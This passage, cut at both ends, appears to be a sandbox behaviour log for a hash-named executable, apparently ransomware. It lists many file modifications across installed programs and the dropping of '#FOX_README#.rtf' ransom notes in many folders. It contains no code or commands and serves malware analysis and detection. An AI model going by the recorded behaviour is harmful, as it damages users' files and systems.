Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\bin\server\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-oql.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft.NET\RedistList\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Berlin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ru\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer_3.2.200.v20140827-1444.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+3 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Bangkok f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Anchorage f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Barbados f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baku f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\ConvertToApprove.svg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-sampler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_pl.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerConstraints.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Eirunepe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Tijuana f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tijuana f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\chrome.7z f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\high-contrast.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffffff_256x240.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\hr.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Urumqi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\setup.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\DVA.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\drive.crx f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.directorywatcher_1.1.0.v20131211-1531.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Moncton f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluHandle.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Malta f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\launcher.win32.win32.x86_64.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32Info.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\rightnav.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\lv.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jakarta f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application-views.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\AUTHORS.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.log f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\docs.crx f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_view.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Tripoli f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\CST6 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\jamendo.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-api.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rio_Branco f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Volgograd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPTSFrame.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Damascus f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_TW.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ta\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogoBeta.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Mozilla Firefox\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\20200722114921.pma f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice_installer.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms_3.6.100.v20140422-1825.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.property_1.4.200.v20140214-0004.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program 